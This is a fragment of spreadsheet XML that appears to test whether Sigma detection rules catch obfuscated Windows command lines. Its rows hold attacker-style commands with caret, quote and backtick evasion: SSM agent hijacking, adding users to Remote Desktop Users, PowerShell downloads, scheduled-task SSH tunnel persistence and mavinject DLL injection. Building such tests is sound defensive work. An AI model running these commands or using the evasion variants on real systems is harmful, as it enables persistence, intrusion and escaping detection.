          <t>Service DACL Abuse To Hide Services Via Sc.EXE (a537cfc3-4297-4789-92b5-345bfd845ad0); Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J794" s="44" t="n"/>
      <c r="K794" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="795" ht="15.75" customHeight="1" s="42">
      <c r="A795" s="44" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B795" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssm_agent_abuse</t>
        </is>
      </c>
      <c r="C795" s="44" t="inlineStr">
        <is>
          <t>Potential Amazon SSM Agent Hijacking</t>
        </is>
      </c>
      <c r="D795" s="44" t="inlineStr">
        <is>
          <t>d20ee2f4-822c-4827-9e15-41500b1fff10</t>
        </is>
      </c>
      <c r="E795" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c amazon-ssm-agent.exe -reg^ister -c^ode "activation-code" -^id "activation-id" -reg^ion "us-east-1"</t>
        </is>
      </c>
      <c r="F795" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G795" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H795" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I795" s="44" t="n"/>
      <c r="J795" s="44" t="n"/>
      <c r="K795" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="796" ht="15.75" customHeight="1" s="42">
      <c r="A796" s="44" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B796" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssm_agent_abuse</t>
        </is>
      </c>
      <c r="C796" s="44" t="inlineStr">
        <is>
          <t>Potential Amazon SSM Agent Hijacking</t>
        </is>
      </c>
      <c r="D796" s="44" t="inlineStr">
        <is>
          <t>d20ee2f4-822c-4827-9e15-41500b1fff10</t>
        </is>
      </c>
      <c r="E796" s="44" t="inlineStr">
        <is>
          <t>amazon-ssm-agent.exe -register	-code	"activation-code"	-id	"activation-id"	-region	"us-east-1"</t>
        </is>
      </c>
      <c r="F796" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G796" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H796" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I796" s="44" t="n"/>
      <c r="J796" s="44" t="n"/>
      <c r="K796" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="797" ht="15.75" customHeight="1" s="42">
      <c r="A797" s="44" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B797" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssm_agent_abuse</t>
        </is>
      </c>
      <c r="C797" s="44" t="inlineStr">
        <is>
          <t>Potential Amazon SSM Agent Hijacking</t>
        </is>
      </c>
      <c r="D797" s="44" t="inlineStr">
        <is>
          <t>d20ee2f4-822c-4827-9e15-41500b1fff10</t>
        </is>
      </c>
      <c r="E797" s="44" t="inlineStr">
        <is>
          <t>amazon-ssm-agent.exe -reg""ister -co""de "activation-code" -i""d "activation-id" -reg""ion "us-east-1"</t>
        </is>
      </c>
      <c r="F797" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G797" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H797" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I797" s="44" t="n"/>
      <c r="J797" s="44" t="n"/>
      <c r="K797" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="798" ht="15.75" customHeight="1" s="42">
      <c r="A798" s="44" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B798" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C798" s="44" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D798" s="44" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E798" s="44" t="inlineStr">
        <is>
          <t>net localgroup "Remote Desktop Users" TEST-HOST -add</t>
        </is>
      </c>
      <c r="F798" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G798" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H798" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I798" s="44" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE (d95de845-b83c-4a9a-8a6a-4fc802ebf6c0); Suspicious Group And Account Reconnaissance Activity Using Net.EXE (d95de845-b83c-4a9a-8a6a-4fc802ebf6c0); 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J798" s="44" t="n"/>
      <c r="K798" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="799" ht="15.75" customHeight="1" s="42">
      <c r="A799" s="44" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B799" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C799" s="44" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D799" s="44" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E799" s="44" t="inlineStr">
        <is>
          <t>net localgroup "Remote Desktop Users" TEST-HOST "/add"</t>
        </is>
      </c>
      <c r="F799" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G799" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H799" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I799" s="44" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE (d95de845-b83c-4a9a-8a6a-4fc802ebf6c0); Suspicious Group And Account Reconnaissance Activity Using Net.EXE (d95de845-b83c-4a9a-8a6a-4fc802ebf6c0); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J799" s="44" t="n"/>
      <c r="K799" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="800" ht="15.75" customHeight="1" s="42">
      <c r="A800" s="44" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B800" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C800" s="44" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D800" s="44" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E800" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c net localgroup "Remote Desktop Users" TEST-HOST /a^dd</t>
        </is>
      </c>
      <c r="F800" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G800" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H800" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I800" s="44" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group (ffa28e60-bdb1-46e0-9f82-05f7a61cc06e); User Added to Remote Desktop Users Group (ffa28e60-bdb1-46e0-9f82-05f7a61cc06e); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J800" s="44" t="n"/>
      <c r="K800" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="801" ht="15.75" customHeight="1" s="42">
      <c r="A801" s="44" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B801" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C801" s="44" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D801" s="44" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E801" s="44" t="inlineStr">
        <is>
          <t>net localgroup "Remote Desktop Users" TEST-HOST /add/</t>
        </is>
      </c>
      <c r="F801" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G801" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H801" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I801" s="44" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group (ffa28e60-bdb1-46e0-9f82-05f7a61cc06e); User Added to Remote Desktop Users Group (ffa28e60-bdb1-46e0-9f82-05f7a61cc06e); User Added to Remote Desktop Users Group (ffa28e60-bdb1-46e0-9f82-05f7a61cc06e); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J801" s="44" t="n"/>
      <c r="K801" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="802" ht="15.75" customHeight="1" s="42">
      <c r="A802" s="44" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B802" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C802" s="44" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
      <c r="D802" s="44" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E802" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { [System.Net.WebClient]::new().DownloadData('http://example.com/test.txt') }"</t>
        </is>
      </c>
      <c r="F802" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G802" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H802" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I802" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J802" s="44" t="n"/>
      <c r="K802" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="803" ht="15.75" customHeight="1" s="42">
      <c r="A803" s="44" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B803" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C803" s="44" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
      <c r="D803" s="44" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E803" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command i`w`r -Uri http://example.com/test.txt -OutFile C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F803" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G803" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H803" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I803" s="44" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation (deb9b646-a508-44ee-b7c9-d8965921c6b6); Powershell Token Obfuscation - Process Creation (deb9b646-a508-44ee-b7c9-d8965921c6b6)</t>
        </is>
      </c>
      <c r="J803" s="44" t="n"/>
      <c r="K803" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="804" ht="15.75" customHeight="1" s="42">
      <c r="A804" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B804" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C804" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D804" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E804" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe  /create /tn "BenignTask1" /sc once /tr C:\windows\system32\cmd.exe /st 20:10</t>
        </is>
      </c>
      <c r="F804" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G804" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H804" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I804" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J804" s="44" t="n"/>
      <c r="K804" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="805" ht="15.75" customHeight="1" s="42">
      <c r="A805" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B805" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C805" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D805" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E805" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "BenignTask2" /sc once /tr C:\windows\system32\cmd.exe /st 20:10</t>
        </is>
      </c>
      <c r="F805" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G805" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H805" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I805" s="44" t="n"/>
      <c r="J805" s="44" t="n"/>
      <c r="K805" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="806" ht="15.75" customHeight="1" s="42">
      <c r="A806" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B806" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C806" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D806" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E806" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "BenignTask3" /sc once /tr C:\windows\system32\cmd.exe /st 20:10</t>
        </is>
      </c>
      <c r="F806" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G806" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H806" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I806" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J806" s="44" t="n"/>
      <c r="K806" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="807" ht="15.75" customHeight="1" s="42">
      <c r="A807" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B807" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation_temp_folder</t>
        </is>
      </c>
      <c r="C807" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder</t>
        </is>
      </c>
      <c r="D807" s="44" t="inlineStr">
        <is>
          <t>39019a4e-317f-4ce3-ae63-309a8c6b53c5</t>
        </is>
      </c>
      <c r="E807" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "TestTask1" /tr "C:\Windows\Temp\test.txt" /sc "once" /st 12:00</t>
        </is>
      </c>
      <c r="F807" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G807" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H807" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I807" s="44" t="n"/>
      <c r="J807" s="44" t="n"/>
      <c r="K807" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="808" ht="15.75" customHeight="1" s="42">
      <c r="A808" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B808" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation_temp_folder</t>
        </is>
      </c>
      <c r="C808" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder</t>
        </is>
      </c>
      <c r="D808" s="44" t="inlineStr">
        <is>
          <t>39019a4e-317f-4ce3-ae63-309a8c6b53c5</t>
        </is>
      </c>
      <c r="E808" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "TestTask1" /tr "C:\Windows\Temp\test.txt" /sc on^ce /st 12:00</t>
        </is>
      </c>
      <c r="F808" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G808" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H808" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I808" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder (39019a4e-317f-4ce3-ae63-309a8c6b53c5); Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE (81325ce1-be01-4250-944f-b4789644556f); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J808" s="44" t="n"/>
      <c r="K808" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="809" ht="15.75" customHeight="1" s="42">
      <c r="A809" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B809" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation_temp_folder</t>
        </is>
      </c>
      <c r="C809" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder</t>
        </is>
      </c>
      <c r="D809" s="44" t="inlineStr">
        <is>
          <t>39019a4e-317f-4ce3-ae63-309a8c6b53c5</t>
        </is>
      </c>
      <c r="E809" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "TestTask1" /tr "C:/Windows/Temp/test.txt" /sc once /st 12:00</t>
        </is>
      </c>
      <c r="F809" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G809" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H809" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I809" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J809" s="44" t="n"/>
      <c r="K809" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="810" ht="15.75" customHeight="1" s="42">
      <c r="A810" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B810" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C810" s="44" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D810" s="44" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E810" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -create /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh.exe -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I810" s="44" t="n"/>
      <c r="J810" s="44" t="n"/>
      <c r="K810" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="811" ht="15.75" customHeight="1" s="42">
      <c r="A811" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B811" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C811" s="44" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D811" s="44" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E811" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh.exe -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I811" s="44" t="n"/>
      <c r="J811" s="44" t="n"/>
      <c r="K811" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="812" ht="15.75" customHeight="1" s="42">
      <c r="A812" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B812" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C812" s="44" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D812" s="44" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E812" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I812" s="44" t="n"/>
      <c r="J812" s="44" t="n"/>
      <c r="K812" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="813" ht="15.75" customHeight="1" s="42">
      <c r="A813" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B813" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C813" s="44" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D813" s="44" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E813" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh.exe -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F813" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I813" s="44" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task (2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J813" s="44" t="n"/>
      <c r="K813" s="44" t="b">
        <v>0</v>
      </c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884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2" min="1" max="1"/>
    <col width="72.43000000000001" customWidth="1" style="42" min="2" max="2"/>
    <col width="47.43" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="60" customWidth="1" style="42" min="5" max="5"/>
    <col width="18.43" customWidth="1" style="42" min="6" max="6"/>
    <col width="21.71" customWidth="1" style="42" min="7" max="7"/>
    <col width="18.57" customWidth="1" style="42" min="8" max="8"/>
    <col width="18" customWidth="1" style="42" min="9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3" t="n"/>
      <c r="B2" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3" ht="22.5" customHeight="1" s="42">
      <c r="A3" s="43" t="n"/>
      <c r="B3" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" s="42">
      <c r="A4" s="43" t="n"/>
      <c r="B4" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C4" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D4" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E4" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="43" t="n"/>
      <c r="J4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K4" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="22.5" customHeight="1" s="42">
      <c r="A5" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B5" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C5" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D5" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E5" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\mavinject.exe 1234 /"INJECTRUNNING" C:\path\to\malicious.dll</t>
        </is>
      </c>
      <c r="F5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I5" s="44" t="n"/>
      <c r="J5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K5" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6" ht="22.5" customHeight="1" s="42">
      <c r="A6" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B6" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C6" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D6" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E6" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\mavinject.exe 1234 -"INJECTRUNNING" C:\path\to\malicious.dll</t>
        </is>
      </c>
      <c r="F6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I6" s="44" t="n"/>
      <c r="J6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K6" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7" ht="22.5" customHeight="1" s="42">
      <c r="A7" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B7" s="44" t="inlineStr">
        <is>
